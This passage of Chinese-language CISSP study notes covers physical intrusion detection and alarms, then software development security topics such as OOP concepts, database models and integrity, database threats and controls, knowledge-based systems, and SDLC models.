*heat-based热能型运动探测仪,对被监控区域中的热能等级和模式的显著变化进行监视。 *wave pattern 波形运动探测仪,向被监控的区域发射连续的弱超声波或高频微波,并且 对反射波的显著扰动或变化进行监视。 *capacitance 电容运动探测仪,对被监控物体周围区域的电场或磁场变化进行探测。 *photoelectric 光电运动探测仪,通常在没有窗户或保持昏暗的房间内部使用。 *passive audio 无源音频运动探测仪,对被监控区域中的非正常声音进行侦听。 *Microwave 微波探测:有 3 种 =>bistatic and monostatic 双基或单基:将受控的微波能量的辐射进入保护区,发射的 微波信号被收到并建立“没有入侵”的基本水平; =>bistatic sensor 分离式传感器:在发送器和接收器之间发送不可见容量的微波; =>Monostatic microwave sensors 集成式传感:集成发送和接收能力的单个探测单元。 —223— ④入侵警报 Intrusion Alarms 也有很多种: *威慑报警 Deterrent Alarms。采用加锁、关门等措施使得进一步的入侵或攻击变得更难。 *排斥报警 Repellant Alarms。汽笛或钟声,还有灯,令入侵者气馁并且离开这个设施。 *通知报警 Notification Alarms。不警示入侵者,仅记录事故数据,并且通知管理员、 保安和执法机构。 *本地报警 Local Alarm System。就是本地的。 *集中式警报系统 Central Station System。通过到远程或集中式监控站。大多数中央集 中式系统都是知名公司,如 Brinks 和 ADT。 *辅助警报系统 Auxiliary Station。辅助警报系统可以加入本地或集中式警报系统中。 当安全边界被侵入破坏时,紧急服务将被通知对事件作出反应并传送到相应地点。这些地点可 能包括消防、警察和医疗机构 ⑤闭路电视/视频监控 CCTV(Closed Circuit TV) CCTV 需要人员观看所捕获的视频来检测可疑和恶意的活动,当然它也有自动识别功能。 一般是作为二次或后续的监控机制,对可疑情况进行审查。CCTV 既是一个预防措施,在审查 记录事件时也是一个检测措施。CCTV 有 4 个基本部件:摄像头 Camera、传输介质 Transmission media、监视器 monitor、外设 Peripherals。 考试会涉及到不同场景需要选择不同的摄像头、镜头、焦距、景深、光圈等等,具体标准 自己根据经验猜吧,懒得摘录了。 景深 The depth of field: 镜头打开越小,景深越大;拍摄目标越远,景深越大;焦距越小,景深越大。 ⑥二次验证 Secondary Verifi cation 员工经常也会有误操作,那么多监控系统也会有误报,这就需要二次验证(输入 2 次密码)。 P.参与解决人员安全问题(例如胁迫、旅行、监控) 1.旅行 旅行外出必须要注意安全保密。如:不带无用的设备,创建强密码,加密敏感信息等。 2.胁迫 就是被威胁时,怎么处置。讲不清楚。 —224— 第八域 软件开发安全(理解、应用与执行软件安全) Chapters 20,21 in OSG 7 th Chapters 10 in AIO 6 th A.理解安全并将其应用于软件开发生命周期 以前旧大纲操作系统安全里的部分内容合到软件开发安全里来了。 一、基础知识 1.编程语言 Programming Languages ①第一代语言(lGL)机器语言 machine languages。CPU 直接执行的指令。(16/2 进制) ②第二代语言(2GL)汇编语言 assembly languages。用符号来代表机器指令。 ③第三代语言(3GL)编译语言(高级语言)compiled languages。用单词语义作为命令。 ④第四代语言(4GL)非常高级语言 Very High-Level。类似自然语言,面向问题,只要说 “做什么”不用写“怎么做”,包括数据库使用的 SQL。 ⑤第五代语言(5GL)自然语言/知识库语言/人工智能语言,允许编程人员创建使用可视接 口的代码,目前还没出现。natural languages/Visual interfaces 此外,其他语言(例如 JavaScript 和 VBScript)是解释性语言,即脚本语言。系统使用解 释器来执行这些源代码,而不需要源代码编译为可执行文件。 2.编译方法 ①汇编程序 assemblers。将汇编语言源代码转换成机器语言。 ②编译器 compilers。将高级语言转换成处理器能理解的机器级别格式的语言(exe/dll)。 编译器可将高级语言编写的软件源代码编译成适合各种平台的可执行程序。 ③翻译器/工具解释器 interpreters。不编译生成可执行文件,而是在执行过程中将高级 语言翻译成机器指令,直接运行。最大的优点是支持跨平台并且翻译器有内存管理的功能,缺 点是不能独立运行,需要安全本地的翻译器(运行环境),如 JVM、.NET。 ④碎片回收器/垃圾回收(garbage collector)。识别并回收之前被使用但已不再被调用的 内存块,同样也收集空闲内存的散块(scattered blocks of free memory)并将这些散块组合 成更大的内存块。所谓的垃圾回收机制。 3.面向对象编程 Object-Oriented Programming 搞清楚“类/class”和“对象/object”就行了,只要编过程序,这都不难。 较早的编程风格(例如函数式编程)关注程序流本身,是信息流模型(输入=>处理=>输出)。 面向对象的编程关注的是对象,更适合建模或模拟现实生活,每个“对象”都对应有其特定的 方法,并被封装(包含),只能通过特定的消息(即输入)访问(类=>对象)。从安全的角度来看, 面向对象的编程提供了一个抽象的黑盒子。用户需要知道一个对象的接口的细节(对应于每个 对象的方法的通常输入,输出和动作),但不一定需要知道对象内部如何有效地使用它来工作。 对象也可以表现出的替换属性,它允许不同的对象提供兼容的操作,以取代彼此。OOP 的优点 是:模块化、延迟承诺(对象的内部组件改进不需要改变系统的其它部分)、可重用性、自然 性。下面是一些常见的面向对象的编程术语: •消息 Message:一条消息与一个对象的通信,或者是一个对象的输入。 —225— •方法 Method:类中定义的操作,在一个对象中是对消息进行响应而执行操作的内部代码。 •封装 encapsulate:为对象赋予几个属性值,将数据结构、操作功能和允许的访问方式 封装到一个实体对象中,可以供其它对象或函数调用。封装实现了数据隐藏功能(data hiding),可以对抗静态代码审计。 •行为 Behavior:对象输出结果,行为是通过一个方法处理消息的结果 •类 Class:对一类具有共同特征的事物的抽象,类是的定义,包括行为、能够做什么以 及做的方法。 •实例 Instance:包含自身方法的类的实例或者例子,实例就是对象。 •多实例化 Multiple instantiation:属于同一个类的多个对象,每个对象有不同的属性。 下面这个说法也是多实例化,是针对数据库的元组的:为同一主键创建多个不同的元组(记 录),它被不同的主体调用时,根据用户组织有不同的输出表现。 •继承 Inheritance:子类延用父类的数据、方法和属性来生成一个类似的又有新功能的 类,继承发生在方法从一个类(父类或超类)被另一个子类(孩子)继承时。 •委派 Delegation:委派是将一个对象的请求转发或者委派给另一个对象,如果一个对象 没有处理消息的方法时进行委派 •多态性 Polymorphism:多态性是一个对象的特性,当外部条件变化时它允许以不同的行 为响应相同的消息或方法。即输入同一消息,会产生不同的结果。发送消息给某个对象,让该 对象自行决定响应何种行为。多态性是通过: 1.接口和实现接口并覆盖接口中同一方法的几不同的类体现的。 2.父类和继承父类并覆盖父类中同一方法的几个不同子类实现的。 •内聚 Cohesion:内聚描述了在同一个类中的方法的目的的关系强度,说明某模块可以独 立执行多个少不同的任务。高内聚:可独立执行某个任务,而不影响其它模块。(就干一件事) •藕合 Coupling:藕合是对象之间相互作用的水平,低藕合意味着较少的相互作用。较低 的藕合提供了更好的软件设计,因为对象更独立。较低的藕合是更容易解决和更新。具有低内 聚的对象为了执行任务需要其他对象的大量的帮助,并且具有高藕合。(谁都别插手) •延迟承诺/递延承诺 deferred commitment:对象的内部组件改进不需要改变系统的其它 部分。 4.失效安全和失效开放 Fail-secure and fail-open 应用程序故障时,其代码应被设计成能有效应对一般意义上的失败,有两个基本选择: ①失效安全状态:置系统于一个高安全级别(甚至完全关闭禁用它)直到管理员可以诊断问 题和恢复系统正常运行。(微软的蓝屏) ②失效开放状态:允许用户绕过失败的安全控制,忽略错误的发生。 在第七域 K.2 章节也已经讲过了,受信恢复:恢复程序确保系统在发生故障或崩溃之后, 能够还原到之前的状态。 系统可以被预置,使其在损坏时能够处于故障防护状态 fail secure system 或者应急开 放状态 fail open system/fail safe system。故障防护状态的系统会在故障发生时保持在防 护状态,并禁止所有访问;而应急开放状态在发生故障前保持在开放的状态,并允许所有访问。 举个栗子就是,一扇自动门如果停电了,是保持关闭还是开放呢?这个取决于系统的业务运行 —226— 重要还是安全更重要。 在状态机模型中(大多数操作系统中),要实现故障防护(失效安全)。 二、数据库和数据仓库 Databases and Data Warehousing 第三域 E.3 章节就是数据库安全 1.数据库管理系统体系结构 尽管目前存在多种可用的数据库管理系统(DBMS),最多的是关系数据库管理系统(RDBMS), 此外,也有层次式的和分布式的。 ①层次型数据模型 Hierarchical data model 这是最早的数据库模型,将关联的记录和字段组合为一个逻辑树结构(就是存储了一堆离 散的数据,每个数据有关于父节点和子节点的信息,这样就成了一个树,像 DNS 服务)。一个 父节点有0到N个子节点,类似于组织结构图。数据是以一种树型结构组织的,树由分支(branch) 或者节点(node)构成。可以认为分支就是数据记录,而分支上的叶子就是数据。层次数据库模 型以一种按等级存储数据的方式,对于适合这种模型的特定应用,如生物学是非常有用的。 层次模型的一个缺点是它只能处理单树,不能在树枝或跨多层链接。 最常用的层次模型实现为轻量级目录访问协议(LDAP)模型。 ②分布式数据模型 distributed data model 将数据存储在多个数据库中,逻辑上是互联的,形如整体,数据映射关系是多对多。 ③关系数据库 Relational Databases 关系数据库是由行和列组成的平面二维表。行和列结构提供了一对一数据映射关系。关系 型数据库的主要构件是表(也被称为关系)。每个表都包含一组相关的记录。 ④网络模型 Network database Model 数据以块或记录类型来表述。块包含数据域,块与块间的行可以表述数据之间的关系。与 层次模型的区别是,数据元素可以拥有多个父节点。 ⑤面向对象模型 Object-Oriented Model 将面向对象编程中的对象数据模型与 DBMS 结合在一起,可存储图像、语音、视频等数据, 也称为 object-oriented databases(OODBs)。面向对象的数据库使用类来定义其对象的属性 和过程,比关系数据库更具有动态性,因为面向对象的数据库在需要时才创建对象,数据和过 程(调用方法)在对象被请求时运行。在关系数据库中,应用程序必须使用自己的过程从数据库 获得数据,然后根据自己的需求处理这些数据。 ⑥对象-关系数据库 object-relational database management system ORDBMS 是一种关系数据库,也是 OODBs 的一个分支。使用面向对象语言编写软件前端,组合了关 系数据库和面向对象的编程的能力,方便了代码重用和故障处理分析,并减少了整体维护工作 量,更适合支持涉及多媒体、CAD、视频、图形和专家系统的复杂应用程序。数据被看作是对 象,对象包括数据项的集合,以及可执行操作的集合。该模型并不需要一个高级语言(函数已 经包含在对象中),用户交互更直接简单。关系模型也相应开始增加面向对象的函数和接口, 从而建立一个“对象—关系”模型。 ⑦数据仓库 Data warehousing 数据仓库指的是为了信息检索和数据分析,将多个异构的数据库或数据源集成为一个大的 —227— 数据库,并提供更多扩展的信息检索和分析的功能,可用于支持决策,数据挖掘,大数据运算。 集成的数据一般会分类和聚类,并不做修改,就是只用不改。 数据仓库由数据集市(date mart)构成,数据集市由数据库(data base)构成。 ⑧元数据 matadata “关于数据的数据”被称作元数据(metadata),描述了数据的结构和相互关系,通常并不 存储在数据仓库 warehouse 中,而是存在具有更高保护级的数据超市/集市(data mart)中,data mart 可以被看作是建在部门一级的小型的数据仓库。 ⑨终端用户数据库 End-User 就是 Dbase、Access 等文件型数据库。 2.表的结构 表就是关系。所有的数据值都是原子的(不能再细分)。 ①纵向:列(column)、属性(attributes)、字段(field),其数量称为度/阶次(degree); ②横向:行(row)、记录(record,)、元组(tuple),其数量称为基数/行数(cardinality)。 记录可以使用多种“键”来进行标识。键是表中字段的子集,是可以唯一标识某个记录的 那个字段。搞清三种键: ①候选键 Candidate Keys。 可以用于唯一标识表中记录的属性子集。姓名、学号、身份证号什么的都是候选键。 ②主键 Primary Keys。 候选键中选出的用来唯一标识表中记录的键被称为主键。每个表都要选一个唯一的最有代 表性的主键。(主键不为空、主键唯一) ③外键 Foreign Keys。 外键被用于在两个表中建立关系(也称做参照完整性/引用完整性)。如果一个表包含一个 “键”,它是另一个表的主键,那么这个“键”就是这个表的外键。(也就是外部链接) 关系模型有两个完整性规则:实体完整性和引用完整性,重点是主键和外键,这些规则源 于 Clark 和 Wilson 完整性模型。 ①实体完整性 Entity integrity 要求元组有一个唯一且非空的主键。 ②引用完整性 referential integrity 要求外键在被引用表中必须存在该值主键的元组。 其实还有一个语义完整性 semantic integrity,要求符合数据结构和语言规则。在后面 又把这 3 个完整性讲了一遍。 如果非主键的属性是空值,这在语言上对数据库来说是个问题,但它不是完整性问题。 3.结构化查询语言 Structured Query Language (SQL) 所有关系数据库都使用一种标准语言,即结构化查询语言(SQL),为用户存储、检索和更 改数据以及管理控制 DBMS 提供了一致的接口。不同供应商的 SQL 版本略有不同,但是都支持 一个核心特性集。 有几个概念: ①模式 Schemas:描述数据库的结构,包括所有用户的访问控制权限。 ②表 Tables:数据的行和列。 ③视图 Views:定义为用户可查看表中的部分信息。视图为每个用户动态的创建,并提供 —228— 访问控制的粒度。 有几种子语言: ①数据定义语言(DDL),允许创建和更改数据库的结构(即模式)。用户很少用到。 ②数据库操作语言(DML),允许用户与数据交互,增、查、改、删。 ③查询语言(QL),用户可以对数据库提出查询请求,通过报表生成器(Report generator) 输出数据。 ④数据控制语言(DCL),用于控制对数据的访问,提供了对 SQL 的安全管理,要重点关注。 常用 DCL 命令有:提交、快照、回滚、设置事务等。 报表生成器:以用户定义的方式生成数据打印输出。 4.数据库范式化 Database Normalization(标准化、规范化) 使数据库表遵从标准、规范的形式的过程称为范式化。最常见的三种形式是 ①第一范式化形式(lNF)。 ②第二范式化形式(2NF)。 ③第三范式化形式(3NF)。 第三是最好的。这三种形式都满足以下需求:减少表中的冗余,消除错误放置的数据,执 行其他许多内部处理任务。 5. ACID 模型 数据库的事务管理是重要的一项工作,不然数据会乱套了。任何一项数据库事务都必须具 有四个特征:原子性,一致性,隔离性,以及持久性。这些属性合称为 ACID 模型。也是锁控 制机制要实现的目标。 ①原子性 Atomicity 数据库事务必须是原子的,也就是说必须是“要么全有,要么全无”。如果事务的任何部 分失败,那么整个事务都要被回滚,就像什么也没发生一样。 ②一致性 Consistency 一方面是数据的更改要与规则一致:所有事务都必须符合和遵守数据库的完整性规则等所 有规则(例如所有记录都具有一个唯一的主键);某个事务执行期间可能临时产生的任何不一致 的数据是不允许被其它事务或应用使用的。另一方面是不同数据库里的数据要一致。 ③隔离性 Isolation 隔离性原则要求事务彼此之间独立操作。如果数据库接收到两个更改相同数据的 SQL 事 务,那么在一个事务被允许更改相同数据之前,另一个事务必须完全结束。 ④持久性/稳定性 Durability 数据库事务必须是持久的,也就是说一旦被提交给数据库,就会被保留下来。数据库通过 使用备份机制(例如事务日志)确保持久性。 6.数据库完整性 数据库管理系统 DBMS 最关注的是完整性,其次是可用性,最后是保密性。数据要保证实 现 3 种类型的完整性: ①语义完整性(Semantic integrity):严格遵循结构化规则和语义规则,也就是数据类型、 逻辑值、唯一性约束等等操作什么的都要符合规则。 —229— ②引用完整性/参考完整性(Referential integrity):外键必须在被引用的表中存在一个 相同值的主键。任何记录(外键)都不能引用一个不存在记录或空值(null value)的主键;如 果一个包含有主键的记录被删除了,被引用的记录也都必须删除掉。 ③实体完整性(Entity integrity):保证了数据实例(tuples)由主键值唯一确定,元组必 须有一个唯一的、非空的主键。 实现完整性可以通过以下操作: ①回滚(rollback):终止当前事务并取消对数据库的更改,数据库恢复至先前状态。 ②提交(commit):终止当前事务处理并执行用户的修改,如果更改不成功则回滚。 ③检查点/保存点(Check point/Save point):相当于虚拟机里的快照,是系统失效或检 测到错误时,用户可以返回的位置,即系统破坏前的某个点。保存点太多会降低 DB 性能,太 少则增加丢失数据的风险。 ④两阶段提交(two-phase commit ):一个事务需要对多个数据库进行操作时,必须确保 所有数据库要么同时都改了,要么都不改,绝不出现数据库没有同步修改的情况。所以要分 2 步走:先提交修改,各数据库临时修改、临时存储结果;然后交易监视器发送“预处理”命令; 最后如果各数据库都响应了命令,监视器就发送“提交”命令,让和数据库真正存储修改后的 数据,否则就发送“回滚”命令。 ⑤shadow 恢复是在之前版本的数据库上重新执行事务,要求使用事务日志来识别最后一 次正确的事务。 ⑥交易(事务)处理 Transaction processes:用户与数据库间是同时并发多个交互的。 ⑦批处理 Batch processing:多处操作按顺序绑定,一次一起执行完。 7.数据库安全 数据库的威胁:(第三域的 E.3 章节详细描述了防范方法) ①聚合 aggregation 组合从不同源获取的非敏感数据生成敏感数据的能力。 ②推理 inference 观察可获取的信息推测(推断)出敏感或受限信息的能力。 ③旁路攻击 用户试图绕过数据训应用的前端控制访问数据。 ④并发 并发相关的问题包括使用旧数据执行过程,不一致的更新,或发生死锁。 ⑤死锁 当两个用户同时访问信息而且都被拒绝时就发生死锁。 ⑥攻击数据库视图以非法访问 用户可能试图受限视图或修改一个已经存在的视图;在数据库接口设计中经常使用的分层 模型提供了一个相同数据的多条路径,不是所有的路径都受到保护。 ⑦拒绝服务 任务类型的可以阻止授权用户共聚信息的攻击或行动。 ⑧不当信息修改 —230— 未授权或授权用户可能故意或无意的错误地修改信息。 ⑨查询攻击 用户尝试使用查询工具来访问不能正常地通过可信前端访问的数据。 ⑩服务器访问 数据库运行的服务器必须防止未授权的逻辑访问同时也要防止未授权的物理访问以防止 逻辑控制被禁用。 ⑾数据污染 由于输入数据错误或错误的处理导致的数据完整性破坏。 ⑿数据拦截(中间人) 如果允许拨号或其它类型的远程访问,必须控制拦截会话或修改传输中的数据的威胁。 ⒀检查时间/使用时间(TOC/TOU)(必考) TOC/TOU 也可能发生在数据库中。一个例子是,一些类型的恶意代码或特权访问可以改变 数据,在用户的查询被许可时和数据展现给用户时。 ⒁未授权访问 故意可无意地将信息发布给未授权用户。例如系统的错误消息或系统提示,提供了关于服 务功能特性等方面的信息。 要实现多种等级的数据库访问控制和安全防护,有很多方法: ①使用视图 Views 视图可以防止聚合攻击。在数据库中实现多级安全性的一种途径是使用数据库视图。视图 可以整理来自多个表的数据、聚合单独的记录或限制用户访问数据库属性和/或记录的有限子 集。在数据库中,视图被存储为 SQL 语旬,而不是被存储为数据表。这样可以减少所需的数据 库空间,并且允许视图违反应用于数据表的规格化规则。因为视图非常灵活,所以许多数据库 管理员将视图作为一种安全工具使用,就是允许用户只与受限的视图交互,而非与作为视图基 础的原始数据表交互。 ②并发性 Concurrency 并发性使用“锁定”功能来允许己授权用户更改数据,同时拒绝其他用户访问查看或更改 数据元素。只有更改完成并“解锁”后,才允许其他用户访问。并发性或编辑控制是一种预防 性的安全机制,这种机制试图使数据库中存储的数据始终是正确的,或者至少使其完整性和可 用性受到保护。 ③语义完整性 Semantic integrity 语义完整性是 DBMS 的一种常见安全特性,确保用户的动作不会违反任何结构上的规则。 此外,还检查所有存储的数据类型都是有效的,符合逻辑的,并且确认系统遵守任何和所有的 唯一性约束。 ④时间戳 Time stamp 通过标记日期和时间来维护数据的完整性和可用性。 ⑤细粒度控制 granularly DBMS 的另一个常见安全特性是在数据库内能够细粒度控制对象。例如:内容相关的访问 控制(基于内容)Content-dependent,分析内容之间的关系来阻止用户访问与他无关的数据, —231— 或者有利益冲突的数据。 ⑥单元抑制 cell suppression 对单独的数据库字段或单元隐藏或强加更安全的约束。 ⑦上下文相关的访问控制(基于上下文环境)Context-dependent 上下文相关的访问控制通过宏观评估来制定访问控制策略,它分析每个对象、数据包或字 段如何与总体的活动或通信相联系,在较大的上下文环境中就会表露出是有益的还是有害的。 ⑧数据库分区 database partitioning 数据库分区技术可以防止聚合和推理漏洞。 ⑨多实例 Polyinstantiation 在同一个关系数据库表中两行或更多行具有相同的主键,且为不同密级的用户提供不同的 数据查询结果,就是多实例。主要防范推理攻击。(这个点经常考到) ⑩噪声和干扰 false or misleading data 在 DBMS 中插入错误的或伪造的数据,从而重定向或阻挠窃密攻击。但一定要确保插入到 数据库中的噪声不影响业务运营。 ⑾锁控制 锁用来控制读和写访问特定的关系系统中的数据行或面向对象系统中的对象。可以在表, 行,记录,或甚至字段上加锁,这些相关的要求也被称为 ACID 测试。 8.数据库接口 考各种接口语言的特点和安全问题。 ①开放数据库互连(ODBC) 访问数据库的用户名和密码以明文存储。 微软的数据库连接 API,开放数据库互连(ODBC)是一种数据库特性,不必对互联互通的数 据库直接进行编程,允许应用程序与不同数据库类型通信。也就是应用程序和后端数据库驱动 程序之间的代理。ODBC 还有一种 API 接口的集合,即 ActiveX 数据对象(ADO, ActiveX Data Objects)。 ②JAVA 数据库连接(JDBC) JDBC 是 Sun 公司开发的 API,用于 Java 程序连接数据库。它可以使 Java 程序直接或通过 ODBC 连接到数据库。要考虑清楚用户的鉴别和访问控制。 ③可扩展标记语言(XML) 安全性最低。XML 本身是明文的。 XML 是一种标记语言,可用中性的格式来表示数据,独立于数据库和应用,以及底层的 DBMS。无线标记语言(WML)是一个基于 XML 语言的实例,它把用于蜂窝电话,寻呼机和个人 数字助理(PDA)之类的通信。 ④对象链接和嵌入数据库(OLE DB) 替代 ODBC 的。对象链接和嵌入(OLE)是 Microsoft 的一个技术,允许一个对象,例如 Excel 电子表格,嵌入或链接到另一对象内部,例如 Word 文档。OLE 使用组件对象模型(COM)协议。 对于对象嵌入,一个提供数据或图像的应用(源)将被包含在另一个应用(目标)的文档中。目标 应用并不了解或有能力编辑它,只是简单地显示或打印。要想编辑或更新嵌入的对象,它必须 —232— 在创建它的应用中打开。这一般双击会自动打开编辑。 OLE DB 是一个底层接口,由 Microsoft 设计用来跨不同的 DBMS 链接数据。它是一个开放 的规范,它的设计基于 ODBC 的成功,提供了一个访问所有类型数据的开放标准,它在客户端 或服务器上可作为中间件运行,可跨越很多不同的应用。它使组织可以轻松地利用信息的优点, 这些数据不只存在于 DBMS 中,也包括当从其它类型的数据源访问数据时。(但仅限于 Windows 接口应用)。OLE DB 架构提供组件,例如直接数据访问接口,查询引擎,游标引擎,优化器, 业务规则和事务管理。 当开发数据库和决定数据如何跨应用链接,或者通过 ODBC 接口或者通过 OLE DB 接口,则 必须在开发阶段考虑安全。 ⑤ActiveX 数据对象(ADO) 新的浏览器实现了沙盒和强 ActiveX 控制以帮助防范此漏洞。 ADO 是 Microsoft 针对所有类型数据的高层接口。它可以用来创建一个前端数据库客户端 或中间层业务对象,其使用一个应用,工具,或 Internet 浏览器。开发人员通过使用 ADO 可 以简化 OLE DB 的开发。对象可以是 Java,JavaScript,VB 和其它面向对象语言的构建组件。 通过使用公共和可重用的数据访问组件(组件对象模型(COM)),不同的应用可以访问所有数据 而不管数据的位置或数据格式。ADO 可以支持典型的客户/服务器应用,HTML 表格,电子表格 和电子邮件引擎信息。注意很多安全专家都担心 ActiveX 的使用,因为无法配置它访问底层系 统的限制。新的浏览器实现了沙箱和强 ActiveX 控件以帮助减轻此漏洞。 9.通过 Internet 访问数据库 互联网访问的通用方法是创建一个分层的架构,分层管理数据,最典型的是三层方法: ①表示层;②业务逻辑层;③数据层。在 B.5 章节 API 安全内容里也讲到了。 10.元数据 关于数据的信息,被称为元数据(关于数据的字面数据或关于数据的知识)。它提供了一个 系统的方法来描述资源和改进信息的提取。目标是帮助用户通过各种源及更好的精度搜索。它 包括与一个应用系统或一个信息、对象关联的数据,目标是描述,关联,法律要求,技术功能, 使用,和保存。它被认为是开发和使用数据仓库的关键组件。元数据有用是因为它提供了: ①数据之间的无法发现的关系; ②关联之前被认为没有关系的数据的能力; ③打开数据仓库内的重要或非常重要数据的钥匙; 唯一考点:元数据是数据中的数据。 11.联机分析处理/在线分析流程(OLAP) OLAP 最大的安全问题是;并发和原子。 包含在数据仓库中的数据通常都是通过前端分析工具访问,例如联机分析处理(OLAP)、 数据挖掘,或数据库知识发现(KDD)方法。OLAP 技术使一个分析师能定制查询,并且基于查 询的结果,定义进一步的查询。分析师可以通过在数据间漫游来收集信息。收集到的信息展现 给管理层。因为数据分析师要解释数据的含义,他或她应具备关于组织的深入了解和组织需要 什么类型的知识以适当的获取信息,用于决策支持。 ①联机事务处理 OLTP(On-Line Transaction Processing) —233— 用于数据库集群 DB cluster,提供容错和高性能。可以监视问题并正确处理问题,确保 要么都正确,要么都不改。 例如,如果一个进程停止运作,那么 OLTP 内的监控机制能够检测到这个问题并试图重新 启动该进程。如果这个进程不能重新启动,那么对应的事务处理将会回滚,从而确保事务处理 的完整性或者数据不出现说误。任何检测到的错误或无效事务处理将会记录到事务处理日志 中。事务处理日志还收集成功事务处理的活动。在执行事务处理前后,数据都将写入日志,以 便建立一个事件记录。OLTP 的主要目标是确保事务处理的正确发生或根本不发生。通常,事 务处理表示一些不可分割的操作独立发生。如果其中一个操作失败,那么其余操作需要回滚, 以确保只向数据库输入准确的数据。 ②数据挖掘 data mining 用于揭示隐藏关系。数据挖掘也称为数据库知识发现 KDD(Knowledge Discovery in Database)。除了 OLAP,数据挖掘是另外一个过程(或工具),其通过对数据执行查询来发现数 据仓库中的信息。数据挖掘是一个决策支持技术,基于一系列的分析技术,其借鉴于数学,统 计学,和遗传学。该技术独立地且与其它技术协作从数据仓库中发现信息。数据发掘用于揭示 隐藏的关系,模型,和数据仓库中的趋势,其是要进行数据挖掘的大量数据的知识库。 数据挖掘既可以发现潜在的入侵,方便审计;也可以用来推理攻击,发现有用的情报。 KDD 用于发现潜在模式或知识的最常用的 3 种方法: ①分类 Classification。根据共同的相似性对数据分组。 ②可能性 Probability。标识数据之间的相互依赖关系,并将可能性应用于它们的关系。 ③统计 Statistical。标识数据元素之间的关系,并使用规则发现。 10.数据字典(Data Dictionary) 数据字典是描述数据元素及其关系的基础库,存储了数据用法、关系、来源和格式等关键 信息,是数据元素定义、架构对象(schema object)和引用键(reference key)的集合,用来对 数据库的数据结构进行集中管理控制。数据库管理软件读取数据字典,确认架构对象存在,并 检查特定用户的进程访问权限。在数据字典中还定义了对每个用户的视图权限设置,如果要改 变数据库的架构,如增加表、字段、记录、视图什么的,必须先更新数据字典。 —234— 三、基于知识的软件系统 KBS 有 3 种类型的以知识为基础的人工智能系统,用来用入侵检测分析是很准确的。 1.专家系统 Expert Systems 专家系统是不可能模拟出人类的情绪的,只能干下象棋的事,一般用于某个专业领域,通 常被 IDS 用于自动检查安全日志。有两个主要的组件:知识库和推理机。 ①知识库,包含专家系统己知的事实和规则 rules(就是对各种情况的判断 if/then)。 ②推理机/推理引擎 inference engine,利用逻辑推理和模糊逻辑技术将输入的信息与知 识库进行对比分析,并基于过去的经验做出结论。 基于规则的编程(rule-based programming)是开发专家系统的通用方法。规则基于 if-then 逻辑单元,规定了一组用于在特定情况下执行的动作。这是用专家系统寻找模式的一 种方法,称为模式匹配(pattern matching) 。 模糊逻辑 Fuzzy Logic 通过使用模糊的界限,允许算法思考控制人类思维的“灰度梯度”。专家系统通过下列 4 个步骤或阶段来使用模糊逻辑:模糊化 fuzzifi cation、推理 inference、合成 composition 以及逆模糊化 defuzzifi cation。 2.人工神经网络 Artificial Neural Networks 人的大脑用模式 pattern 来存储信息,用神经元 neuron 来记忆和思考。在神经网络中, 计算单元链被用来模仿人脑的生物学推理过程,用计算单元来模仿神经元。即建立 1 个计算机 单元分析判断输出、互相关联、最终生成相关结果的计算决策长链。神经网络的优点包括线型、 输入-输出映射和自适应性。在用于语音识别、脸部识别、天气预报和意识与思考模型研究的 —235— 神经网络实现中,这些优点十分明显。具体的算法就搞不清楚了。 神经网络可以自学习,这种活动被称为 Delta 规则或学习规则。 3.决策支持系统 Decision Support Systems 决策支持系统(DSS)是一种知识型应用,它分析业务数据并且以更容易作出业务决策的形 式提供给用户,一般以图形方式提供信息,并有某个数据库的专家系统的支持。 A.1 开发方法论(例如:敏捷开发、瀑布模型) 在系统生命周期中使用的术语五花八门,不同书写的都不一样,这没关系,CISSP 考的是 你对基本原理的理解。 1.包括安全管理的标准的软件开发流程 在 officail guide 7 里是这么写的 7 个阶段: ①概念定义 Conceptual definition。发布包含项目目标和系统需求的声明。(立项报告) ②确定功能需求 Functional requirements determination。完成需求规格说明书。 ③控制规范开发 Control specifications development。研究提出实现所有安全功能的 系统开发的方法规范。 ④设计评审 Design review。上面的②是功能规格,③是控制规格,之后就是写代码做开 发。等设计团队搞完了,就要开评审会议了,确保开发的方向正确。 ⑤代码走查 Code review walk-through。编码设计的各个阶段都要安排几次代码走查, 这些技术会议只组织开发人员,对特定的代码进行走查,寻找逻辑错误或其他设计/安全缺陷。 ⑥用户验收测试 System test review。交房、验房、收房。 ⑦维护和变更管理 Maintenance and change management。系统已经部署使用了。 重点了解下面这个流程: 在 CBK 里是这么写的,一般包括 7 个基本阶段和 2 个附加阶段: ①项目启动与规划 initiation。(系统建设与安全建设要同步规划、同步实施) ②功能需求定义 functional requirement definition。 ③系统设计规范/规格说明(建模)system design specification。 ④开发与实施 development and implementation。 ⑤文档管理与版本控制 documentation and common program controls。 ⑥测试和评估控制(认证与认可/认证与确证)testing and evaluation controls(certification and accreditation/Verification and Validaion)。(不能用生产 数据,会泄密的) ⑦交付使用(部署上线)transition to production(implementatoin)。(开发、测试、 生产环境要互相物理隔离) 附加阶段,是系统生命周期(SLC)多出来的 2 个阶段,不是系统开发生命周期 SDLC: ⑧运行与维护支持(安装后)operation and maintenance。 ⑨修订和系统升级 revisions and system replacement。 —236— 软件需求可以用 3 种模型来表示: ①信息模型。规定要处理的信息类型和处理方式。 ②功能模型。概述应用程序需要执行的任务和功能。 ③行为模型。解释在具体事务处理发生过程中和发生之后应用程序的状态。 2.软件开发生命周期(SDLC)模型 software development life cycle SDLC 用来规范软件开发实践。很多模型是交叉的。模型是什么大类不重要,重要的是掌 握各种模型的优、缺点。 1.瀑布模型 Waterfall Model 按标准流程一步一步走,不能改顺序;上一步骤全部完成,才能进入下一个步骤;一个步 骤出问题,就回到上一步骤来纠正(即反馈回路特性 feedback loop characteristic)。 ①螺旋模型 Spiral Model 一个瀑布式过程的多次选代,也可以封装许多其他模型,他被称为一个元模型,即“模型 的模型”,就是走完一个模型流程,再走一遍,每次有所改进就行了。它的特点是在时间轴上 的每一个阶段内,运用戴明环模型(PDCA)(计划-执行-检查-行动),突出风险评估,基于 风险评估对成本、计划等进行调整,并决定项目是继续还是取消。在每一个阶段内,也有运用 其它四个阶段的流程:制定计划、风险分析、开发和测试、客户评估。模型中的角度代表进步, 螺旋半径代表成本。 ②净室模型 也是瀑布的一种,可用于控制软件缺陷,目标是初写的代码必须要完善无错,不在事后找 BUG。从安全角度看,前期充分考虑安全防护比后期附加保护的效果要好。 ③V 型模型(总-分-总的瀑布) V 型模型在瀑布模型之后出现,取代软件开发过程中扁平的线性方法,它与瀑布模型一样 按照顺序路径开发,每个阶段必须完成之后下个阶段才能开始,但成功概率更高。因为先从上 到下的细化设计,再从下到上的单元集成,每个阶段都要通过测试才行。 2.迭代开发/增量模型 